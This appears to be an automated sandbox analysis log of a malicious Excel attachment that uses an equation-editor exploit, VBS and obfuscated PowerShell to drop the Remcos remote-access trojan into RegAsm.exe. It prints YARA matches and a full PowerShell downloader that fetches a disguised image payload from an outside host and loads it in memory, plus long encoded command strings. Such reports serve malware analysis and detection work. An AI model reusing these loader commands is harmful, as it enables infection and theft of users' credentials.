Source: 00000012.00000002.568213344.0000000004346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3100, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 4380, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\beautifulroseipictureiseenitsshowingasabeautifulflowerwhichcomingfromtheworldanditsshowinghowbeautiful___sheiswhenthatroseonhairbeautiful[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49740FD3.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: bhv497F.tmp.29.dr, bhv65C6.tmp.33.dr Binary or memory string: org.slneighbors
Source: classification engine Classification label: mal100.spre.phis.troj.spyw.expl.evad.winXLSX@107/38@23/9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 29_2_004182CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 28_2_00417952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle, 31_2_00410DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 29_2_00418758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, 28_2_0040F474
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource, 28_2_0041B4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 28_2_0041AA4A
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$INQUIRY#46789.xla.xlsx Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-NVSJ5U
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR691E.tmp Jump to behavior
Source: INQUIRY#46789.xla.xlsx OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\beautifulpictureforcouples.vbs"
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ................................s.l.m.g.r...v.b.s...............(...............................................(.........................).....
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ................................w.i.n.r.m...v.b.s...............(...............................................(.........................).....
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ................................ . . . . . . . .1. .f.i.l.e.(.s.). .c.o.p.i.e.d...........).....................(.......6.................).....
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe System information queried: HandleInformation
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.602819975.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: RegAsm.exe, RegAsm.exe, 0000001E.00000002.598512173.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 0000001D.00000002.602819975.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.602819975.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: RegAsm.exe, 0000001D.00000002.602291714.00000000001DF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.603922456.000000000071F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.610551171.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, chp43D6.tmp.33.dr, chp32A7.tmp.29.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));"
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.602819975.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.602819975.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 0000001D.00000002.602819975.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: INQUIRY#46789.xla.xlsx Virustotal: Detection: 7%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\beautifulpictureforcouples.vbs"
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1312 --field-trial-handle=1164,i,12295788173595172978,5315075123005719965,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FFBK/0209/69.242.571.701//:ptth' , '1' , 'C:\ProgramData\' , 'sabelianos','RegAsm',''))} }"
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1320,i,11995020747881027354,7636769829744668384,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\sabelianos.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\huqveuwntqlrmlybthcenbzzriklfmudg"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rwdne"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\briyfxzid"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\sabelianos.vbs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jcpa"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twutehs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wyzefsckuj"
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1312,i,12721759368113981321,9650863181706294674,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1448 --field-trial-handle=1312,i,8048391771101427258,3488663973075303133,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(s)/
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1416 --field-trial-handle=1212,i,15387615927566497572,6828730572207653402,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1356 --field-trial-handle=1136,i,61898105425524230,6329090133456978348,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=1372,i,7040727732145984363,3593676648702084306,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(s)/
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=820 --field-trial-handle=1404,i,17451326606051937967,12013872481303463395,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1328,i,9707891231919903179,15563385993840059589,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\beautifulpictureforcouples.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0D